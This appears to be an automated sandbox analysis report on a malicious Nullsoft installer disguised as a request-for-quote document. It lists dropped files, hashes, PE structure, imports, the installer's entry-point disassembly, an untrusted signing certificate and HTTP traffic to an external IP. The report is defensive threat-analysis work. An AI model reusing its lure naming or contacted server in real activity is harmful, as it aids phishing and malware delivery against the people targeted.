                                                                  Preview:.............................................}...........................................................................................................................................................................................................................................................................................................................................................................................................................}........................................................................................................................................................................................................................................................................................................................................................................................................................................&.....................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):103250
                                                                  Entropy (8bit):0.153289126188079
                                                                  Encrypted:false
                                                                  SSDEEP:48:51et5wYK0ExqwezIgKIpS74cjRXV9n8lRBh:5obK0E8N0ZIptcjTmB
                                                                  MD5:16AD8C973DB78EAE5FD2EE03DFD8547E
                                                                  SHA1:21A3829B33366ABB4F608089E38BF9F883A04776
                                                                  SHA-256:0C6B3CA54E4922CC65C5B2A52E30C14F54F08BDE09CF65B47AB5A38ACA88623D
                                                                  SHA-512:458546D9A32E914B69ACE83D65F53B4E65F1BB217EBC0BD9CA7DB611AA29CA41896DEBF2C7475187F6B8BDAB6B1E08E59B124B4F882E245189B2E58A36F53499
                                                                  Malicious:false
                                                                  Preview:.........................................................................................................................................................................................................G........................................................................".............................................@.....................................S..........C............................................................................k........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):95900
                                                                  Entropy (8bit):0.15279681115450483
                                                                  Encrypted:false
                                                                  SSDEEP:24:9q1fEu8sUahZ+CANpCDEUeQkTaMfH/uniB2pOgitVy6TzLO0nFL6ricp8ccN:9UsEh8VOAQkmkfuzObLnnRYi3dN
                                                                  MD5:E500573BDBFFFEDBFF59AA78E6453253
                                                                  SHA1:294B3F7A3E85C4836D5E42AF1403AF8C4D63B5D2
                                                                  SHA-256:70E2B274815569952131806820DE19E3CC6AF9ED5CD910C859F7C732DA3892FA
                                                                  SHA-512:BD756B0E14E14FBA2C227DC7C3E8ADFA67E0E2DEF04A3BC3195509972A335DAF3CBDFBFD308BFC556841C3E81980A4E9957EAC66D370496E998C2D87E4D11BBB
                                                                  Malicious:false
                                                                  Preview:.................................................................................................................................................................E..............................................................r.................................................................................................................................................................................................................................................................................................................................................................................................................................^..............................................................................................................................................................................................................................................................................................................................................k......................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):82371
                                                                  Entropy (8bit):0.16126163666315105
                                                                  Encrypted:false
                                                                  SSDEEP:48:jHqOWE7rsF8PdbePNn0DfgAgfDduLabo:j/cF7PluYfD0m
                                                                  MD5:2265603B0BE901CD7A3538A34A68FCD0
                                                                  SHA1:0FE8CA6B6C2021B11F4569C7D3B5C8197DE3E916
                                                                  SHA-256:B4ED7F54177A1280C524E1CE3204AC0FC3BD6951008AC1098072A34C47C130A9
                                                                  SHA-512:94811E0AE7142224B7578BA488AB9794AC731839D6A941CB32DA969AC6FB6C587559110ECF847621D41CDD0D0F1EFEF705A4D5AB198E78B0AF7DB012AF70EEC6
                                                                  Malicious:false
                                                                  Preview:............................................................................................................................................................................................................................5............................................................................................................................................-.............................................................r...........................................................................................................................................................................................................e.......................................................................................................................................................................................................................................................................................(............................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):266713
                                                                  Entropy (8bit):0.16280274939080083
                                                                  Encrypted:false
                                                                  SSDEEP:384:6xwxH2tAdCtVkHWaj6i+qLkJ/+V8lyXiMz:Mt3jMATyya
                                                                  MD5:D06162C81455111332E1CA89E66EA98E
                                                                  SHA1:0D7576924254B1D85F71E4981B57F73CED051AF6
                                                                  SHA-256:1AA44A97380F50F14E686FCFDF8FE0C25D140CC1CC7209CBA11CE5563D2170D6
                                                                  SHA-512:43A68DF862CAB86253E0278FC78CDA296B4B9897721CC4B098506E056F7A33EDFDCAE78C14510DC56B4B9660028CC1AE58C4F3B7BBAB7095FD19BBE85B4737D3
                                                                  Malicious:false
                                                                  Preview:............................................................................................................................................................................................................................................................................................................................................................................................................................................N.............................................................................................................~................................................................................................................................................................................................D.........................................................A..................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Category:dropped
                                                                  Size (bytes):389472
                                                                  Entropy (8bit):7.700316054821576
                                                                  Encrypted:false
                                                                  SSDEEP:6144:IUj/wCLmZS6+GpBAcbO0gDKeD8Wk4ubDWSOeij1aNltfkafgIxhQ5Y8HndM7zgD4:Iqfmc6+GTASWjkx5OeScNL7hQ5DHnC+4
                                                                  MD5:C35A5008193E77C7AFDF53D7FCC20F37
                                                                  SHA1:1547E797FC8DFEBE43591583B7F8C5D130EAFC77
                                                                  SHA-256:B4702B8CAFF8174AA2FAAF8F2E963D6AE79BEEE73054747DB74B2CC21997885C
                                                                  SHA-512:1658F60E7A7813C52927FF025EF26381DA54A75C0A505CA271940F1DD02503510476EDDEDCBD9F44DC56D2DAD27C32DA4EAF21BD4AE71A23FD04131578EC861B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 18%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@..................................)....@..................................u..........x...............P............................................................p...............................text...._.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....ndata...0...............................rsrc...x............~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Category:dropped
                                                                  Size (bytes):389472
                                                                  Entropy (8bit):7.700316054821576
                                                                  Encrypted:false
                                                                  SSDEEP:6144:IUj/wCLmZS6+GpBAcbO0gDKeD8Wk4ubDWSOeij1aNltfkafgIxhQ5Y8HndM7zgD4:Iqfmc6+GTASWjkx5OeScNL7hQ5DHnC+4
                                                                  MD5:C35A5008193E77C7AFDF53D7FCC20F37
                                                                  SHA1:1547E797FC8DFEBE43591583B7F8C5D130EAFC77
                                                                  SHA-256:B4702B8CAFF8174AA2FAAF8F2E963D6AE79BEEE73054747DB74B2CC21997885C
                                                                  SHA-512:1658F60E7A7813C52927FF025EF26381DA54A75C0A505CA271940F1DD02503510476EDDEDCBD9F44DC56D2DAD27C32DA4EAF21BD4AE71A23FD04131578EC861B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 18%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@..................................)....@..................................u..........x...............P............................................................p...............................text...._.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....ndata...0...............................rsrc...x............~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.700316054821576
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File size:389'472 bytes
                                                                  MD5:c35a5008193e77c7afdf53d7fcc20f37
                                                                  SHA1:1547e797fc8dfebe43591583b7f8c5d130eafc77
                                                                  SHA256:b4702b8caff8174aa2faaf8f2e963d6ae79beee73054747db74b2cc21997885c
                                                                  SHA512:1658f60e7a7813c52927ff025ef26381da54a75c0a505ca271940f1dd02503510476eddedcbd9f44dc56d2dad27c32da4eaf21bd4ae71a23fd04131578ec861b
                                                                  SSDEEP:6144:IUj/wCLmZS6+GpBAcbO0gDKeD8Wk4ubDWSOeij1aNltfkafgIxhQ5Y8HndM7zgD4:Iqfmc6+GTASWjkx5OeScNL7hQ5DHnC+4
                                                                  TLSH:DB84F147B75C83AEE39A4AB2387907319668EF531914250ABFD4FE3E153168D2E036D2
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@
                                                                  Icon Hash:24ed8d96b2ade832
                                                                  Entrypoint:0x40326a
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                  Signature Valid:false
                                                                  Signature Issuer:E=Tusserne@Krematoriernes.Ang, O=creditrix, OU="Benzidins Allocative ", CN=creditrix, L=Sumner, S=Texas, C=US
                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                  Error Number:-2146762487
                                                                  Not Before, Not After
                                                                  • 14/11/2023 04:37:29 13/11/2026 04:37:29
                                                                  Subject Chain
                                                                  • E=Tusserne@Krematoriernes.Ang, O=creditrix, OU="Benzidins Allocative ", CN=creditrix, L=Sumner, S=Texas, C=US
                                                                  Version:3
                                                                  Thumbprint MD5:1580D7A513AF36DAE364D9D77AF552D1
                                                                  Thumbprint SHA-1:53B8CAC21D91C83BFD874B35C02C1DE1308089A2
                                                                  Thumbprint SHA-256:A44863F22A94226AF9F6F0EE2A74CC2ED8A432F690005FD2B3DD669C0256D2B0
                                                                  Serial:35934FFBBD16B6FDAFC3217DDCCDFB5AF0C9985C
                                                                  Instruction
                                                                  sub esp, 000002D4h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  pop edi
                                                                  xor ebx, ebx
                                                                  push 00008001h
                                                                  mov dword ptr [esp+14h], ebx
                                                                  mov dword ptr [esp+10h], 004092E0h
                                                                  mov dword ptr [esp+1Ch], ebx
                                                                  call dword ptr [004070B0h]
                                                                  call dword ptr [004070ACh]
                                                                  cmp ax, 00000006h
                                                                  je 00007FD6A49178F3h
                                                                  push ebx
                                                                  call 00007FD6A491AA34h
                                                                  cmp eax, ebx
                                                                  je 00007FD6A49178E9h
                                                                  push 00000C00h
                                                                  call eax
                                                                  mov esi, 004072B8h
                                                                  push esi
                                                                  call 00007FD6A491A9AEh
                                                                  push esi
                                                                  call dword ptr [0040715Ch]
                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                  cmp byte ptr [esi], 00000000h
                                                                  jne 00007FD6A49178CCh
                                                                  push ebp
                                                                  push 00000009h
                                                                  call 00007FD6A491AA06h
                                                                  push 00000007h
                                                                  call 00007FD6A491A9FFh
                                                                  mov dword ptr [00429204h], eax
                                                                  call dword ptr [0040703Ch]
                                                                  push ebx
                                                                  call dword ptr [004072A4h]
                                                                  mov dword ptr [004292B8h], eax
                                                                  push ebx
                                                                  lea eax, dword ptr [esp+34h]
                                                                  push 000002B4h
                                                                  push eax
                                                                  push ebx
                                                                  push 004206A8h
                                                                  call dword ptr [00407188h]
                                                                  push 004092C8h
                                                                  push 00428200h
                                                                  call 00007FD6A491A5E8h
                                                                  call dword ptr [004070A8h]
                                                                  mov ebp, 00434000h
                                                                  push eax
                                                                  push ebp
                                                                  call 00007FD6A491A5D6h
                                                                  push ebx
                                                                  call dword ptr [00407174h]
                                                                  add word ptr [eax], 0000h
                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x75040xa0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000xdd78.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x5d9100x1850
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b4.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x5ff90x600034f0469eb860d5ecf0e52ef9d3820a60False0.6667073567708334data6.4734859396670705IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x70000x13a40x1400848ecd58951d0a4cfe8ec8cfce6b20d1False0.452734375data5.125569346027248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x90000x202f80x6003953dbb7217e7539ee75e90871f7aef9False0.4947916666666667data3.9050018847265378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x2a0000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x4d0000xdd780xde00473513e65a4d317109b5afbbc13361f6False0.09982052364864864data3.829765119905778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x4d2080xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/mEnglishUnited States0.07864312267657993
                                                                  RT_DIALOG0x5a4300x100dataEnglishUnited States0.5234375
                                                                  RT_DIALOG0x5a5300x11cdataEnglishUnited States0.6056338028169014
                                                                  RT_DIALOG0x5a6500xc4dataEnglishUnited States0.5918367346938775
                                                                  RT_DIALOG0x5a7180x60dataEnglishUnited States0.7291666666666666
                                                                  RT_GROUP_ICON0x5a7780x14dataEnglishUnited States1.15
                                                                  RT_VERSION0x5a7900x2a4dataEnglishUnited States0.492603550295858
                                                                  RT_MANIFEST0x5aa380x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153
                                                                  DLLImport
                                                                  KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                  USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                  ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 8, 2024 09:41:08.702569962 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:08.807377100 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:08.807549000 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:08.807914972 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:08.912961960 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:08.913042068 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:08.913101912 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:08.913161039 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:08.913300991 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:08.913301945 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:08.913367987 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.018414021 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.018486977 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.018547058 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.018600941 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.018656015 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.018676043 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.018709898 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.018733978 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.018765926 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.018821955 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.018838882 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.018840075 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.018898010 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.018898010 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.019052982 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124002934 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124102116 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124191999 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124213934 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124279976 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124293089 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124351978 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124444008 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124445915 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124447107 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124505997 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124552011 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124631882 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124643087 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124701023 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124759912 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124813080 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124813080 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124862909 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.124878883 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124948978 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.124972105 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.125041962 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.125052929 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.125052929 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.125149965 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.125169992 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.125220060 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.125236034 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.125380993 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.125447989 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.230345964 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.230422974 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.230480909 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.230566025 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.230623960 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.230643988 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.230679989 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.230715990 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.230747938 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.230763912 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.230803013 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.230803967 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.230803967 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.230967999 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.230968952 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231019020 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231087923 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231151104 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231206894 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231218100 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231261015 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231266975 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231317997 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231374025 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231410980 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231410980 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231441975 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231468916 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231497049 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231554031 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231573105 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231621981 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231622934 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231678009 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231733084 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231734991 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231784105 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231787920 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231837988 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231842041 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231889009 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.231897116 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.231950998 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.232006073 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.232022047 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.232022047 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.232059956 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.232098103 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.232098103 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.232115030 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.232139111 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:41:09.232168913 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:41:09.232187986 CEST5131680192.168.11.20167.160.166.205
